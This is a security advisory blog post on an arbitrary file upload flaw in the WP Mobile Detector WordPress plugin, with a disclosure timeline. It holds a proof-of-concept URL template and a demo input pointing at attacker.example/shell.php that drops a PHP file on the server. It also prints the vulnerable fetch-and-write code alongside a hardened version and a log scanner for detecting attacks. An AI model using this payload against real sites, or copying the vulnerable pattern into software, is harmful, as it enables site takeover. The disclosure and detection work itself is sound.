Arbitrary File Upload Vulnerability in WP Mobile Detector
A few days ago we had a HEAD request for the file /blog/wp-content/plugins/wp-mobile-detector/resize.php, which is a file in the plugin WP Mobile Detector. Since we don’t have that plugin installed, the most likely explanation is that someone was checking for the existence of the file before trying to exploit a vulnerability in the plugin. Looking around we couldn’t find any public disclosure of a vulnerability involving that particular file, but a quick look at the file showed that the plugin has an arbitrary file upload vulnerability. The severity of the vulnerability is lessened somewhat by the fact that it requires the server to have a PHP option enabled (allow_url_fopen, discussed below) that introduces the potential for security risks like this.
The code in the file first checks whether a file exists in the plugin’s cache directory, with the file name taken from the GET or POST value “src” (basename() strips any directory part from it):

```php
<?php
// resize.php, excerpt from the start of the file
if (isset($_REQUEST['src'])) {
    $path = dirname(__FILE__) . "/cache/" . basename($_REQUEST['src']);
    if(file_exists($path)){
```

If the file doesn’t exist, it is created from whatever “src” points to:

```php
// resize.php, excerpt from further down in the same if block
}else{
    file_put_contents($path, file_get_contents($_REQUEST['src']));
```
The file_get_contents() function used to get the file’s contents accepts a URL as its filename argument when PHP’s allow_url_fopen option is enabled. In that case an attacker can have the server fetch any file they want and write it into the plugin’s cache/ directory, which sits under wp-content and is therefore web accessible. Note that basename() only strips directory components from the destination name; the attacker still chooses the final file name through the last path segment of the URL, so pointing “src” at a URL ending in .php leaves an attacker-controlled PHP file on the site. The file_exists() check stops an existing cache file from being overwritten, but it does nothing to stop a new file from being written. allow_url_fopen is enabled in PHP’s default configuration, though some web hosts turn it off precisely because it can lead to this type of issue; you can check whether it is enabled with the phpinfo() function or by looking at the value of ini_get('allow_url_fopen').
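To make the difference concrete, here is an added illustration (written for this post, not the plugin’s own code and not its 3.6 fix) that puts the vulnerable shape of resize.php next to a version that cannot be used to upload anything. The hardened function only ever serves a file that already exists inside the cache directory; it never fetches or writes on the request path. The file names, the temporary cache directory and the attacker host attacker.example are assumptions made for the demo.

```php
<?php
// Added illustration, not the plugin's code: vulnerable vs. hardened handling of "src".
declare(strict_types=1);

// Vulnerable shape from resize.php as described in the post: "src" decides both the
// cache file name and, when that file is missing, where the content is fetched from.
// With allow_url_fopen on, src=http://attacker.example/shell.php writes cache/shell.php.
function vulnerable_cache_path(string $src, string $cacheDir): string
{
    $path = $cacheDir . '/' . basename($src);
    if (!file_exists($path)) {
        file_put_contents($path, file_get_contents($src));
    }
    return $path;
}

// Hardened: return the real path of an existing cache file, or null. Nothing is
// fetched and nothing is written, so there is no upload primitive left.
function safe_cache_path(string $src, string $cacheDir): ?string
{
    // Reject anything carrying a scheme or stream wrapper (http://, ftp://, php://,
    // data:, ...) before it reaches any filesystem or stream function.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $src) === 1) {
        return null;
    }
    // Only plain image-like names: no directory separators, no traversal, no .php.
    if (preg_match('/\A[A-Za-z0-9_-]+\.(?:jpe?g|png|gif)\z/', $src) !== 1) {
        return null;
    }
    $realCache = realpath($cacheDir);
    $realPath  = realpath($cacheDir . '/' . $src);
    if ($realCache === false || $realPath === false) {
        return null; // cache dir missing or file not present: do NOT create it
    }
    // Containment check, so a symlink inside cache/ cannot point elsewhere.
    if (strpos($realPath, $realCache . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $realPath;
}

// Demo against a throwaway cache directory (assumed layout, not the plugin's).
$cache = sys_get_temp_dir() . '/wpmd-cache-' . bin2hex(random_bytes(4));
mkdir($cache, 0700);
file_put_contents($cache . '/legit.png', "\x89PNG");

// basename() keeps the attacker-chosen last segment, which is why the original is exploitable.
echo "basename of the attack URL: ", basename('http://attacker.example/shell.php'), "\n";

$inputs = ['legit.png', 'http://attacker.example/shell.php', '../../wp-config.php', 'shell.php'];
foreach ($inputs as $src) {
    $result = safe_cache_path($src, $cache);
    printf("%-40s -> %s\n", $src, $result === null ? 'rejected' : 'served ' . $result);
}
```

The vulnerable function is included only for comparison and is never called by the demo. If a plugin genuinely needs to fetch remote images, the fetch belongs in an admin-only code path, with the scheme restricted to http/https, the content type checked with finfo, and the stored name generated by the server rather than taken from the URL.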
Proof of Concept
Make sure to replace “[path to WordPress]” with the location of WordPress and “[URL of upload file]” with the URL of the file you want to upload.
http://[path to WordPress]/wp-content/plugins/wp-mobile-detector/resize.php?src=[URL of upload file]
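Because the proof of concept above leaves a clear trace in web server logs (a request to resize.php whose “src” carries a URL, usually preceded by a probe for the file and followed by a request for the dropped file in cache/), site owners can check whether they were hit. The following is an added example written for this post, not code from the plugin or its author; the Apache combined-format log lines are constructed for the demo and the IP addresses in them are documentation ranges. The cache directory path assumes the script is run from the WordPress root.

```php
<?php
// Added example, not from the original post: spot resize.php abuse in access logs
// and look for PHP files that should not exist in the plugin's cache/ directory.
declare(strict_types=1);

// Constructed sample log (Apache combined format), not real traffic.
const SAMPLE_LOG = <<<'LOG'
203.0.113.7 - - [30/May/2016:03:12:01 +0000] "HEAD /blog/wp-content/plugins/wp-mobile-detector/resize.php HTTP/1.1" 200 - "-" "Mozilla/5.0"
203.0.113.7 - - [30/May/2016:03:12:04 +0000] "GET /blog/wp-content/plugins/wp-mobile-detector/resize.php?src=http%3A%2F%2F198.51.100.9%2Fa.php HTTP/1.1" 200 41 "-" "Mozilla/5.0"
198.51.100.23 - - [30/May/2016:03:15:22 +0000] "GET /blog/wp-content/plugins/wp-mobile-detector/resize.php?src=logo.png HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [30/May/2016:03:12:09 +0000] "GET /blog/wp-content/plugins/wp-mobile-detector/cache/a.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
LOG;

/**
 * Returns one entry per suspicious line with the client IP, the decoded "src"
 * value (or null) and the reason. A request for resize.php with no "src" is
 * reported as a probe, since that is how the post's observation began; a plain
 * file name in "src" is normal plugin traffic and is left alone.
 */
function find_resize_abuse(string $log): array
{
    $hits = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})/', $line, $m)) {
            continue; // not a combined-format line
        }
        [, $ip, $method, $target, $status] = $m;
        $url  = parse_url($target);
        $path = $url['path'] ?? '';

        // A PHP file being requested out of cache/ is the dropped payload being used.
        if (preg_match('#/wp-mobile-detector/cache/[^/]+\.php$#', $path) === 1) {
            $hits[] = ['ip' => $ip, 'src' => null, 'reason' => "PHP file requested from cache/ ($path)"];
            continue;
        }
        if (preg_match('#/wp-mobile-detector/resize\.php$#', $path) !== 1) {
            continue;
        }
        $query = [];
        parse_str($url['query'] ?? '', $query); // URL-decodes src for us
        $src = $query['src'] ?? null;
        if ($src === null) {
            $hits[] = ['ip' => $ip, 'src' => null, 'reason' => "probe ($method, status $status)"];
            continue;
        }
        // Any scheme or stream wrapper in src is the file_get_contents() fetch primitive.
        if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $src) === 1) {
            $hits[] = ['ip' => $ip, 'src' => $src, 'reason' => 'remote src: upload attempt'];
        }
    }
    return $hits;
}

// Anything ending in .php under the plugin's cache/ directory should not be there.
function cache_php_files(string $cacheDir): array
{
    return array_map('basename', glob($cacheDir . '/*.php') ?: []);
}

foreach (find_resize_abuse(SAMPLE_LOG) as $hit) {
    printf("%-15s %-32s %s\n", $hit['ip'], $hit['src'] ?? '-', $hit['reason']);
}

// Assumed to be run from the WordPress root; prints nothing if the directory is absent.
$cacheDir = __DIR__ . '/wp-content/plugins/wp-mobile-detector/cache';
foreach (cache_php_files($cacheDir) as $name) {
    echo "unexpected PHP file in cache/: $name\n";
}
```

On the sample input the scanner reports the HEAD probe, the upload attempt with the decoded URL http://198.51.100.9/a.php, and the follow-up request for cache/a.php, while the legitimate src=logo.png request is ignored. Treat any hit as a reason to inspect cache/ and the rest of the site for files written around that time, since the dropped file may already have been used to install something elsewhere.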
Timeline
- 5/29/2016 – Notified developer.
- 5/31/2016 – Notified wordpress.org Plugin Directory.
- 5/31/2016 – Plugin removed from the Plugin Directory.
- 6/2/2016 – Version 3.6 released, which fixes vulnerabilities.
Pingback: WordPress Patches WP Mobile Detector Plugin Zero Day | Threatpost | The first stop for security news
Much thanks for this. Had several clients affected.
Pingback: WP Mobile Detector Plugin being exploited in the wild
Pingback: A new WordPress plug-in exploit endangers thousands of websites | Network World
Pingback: Urgent patch for 0-day in WP plugin Mobile Detector | Threatpost | Information security news
Pingback: WordPress plugin with 10,000+ installations being exploited in the wild | Ars Technica
Pingback: WordPress Security Updates Roundup (June 2016) | securityinaction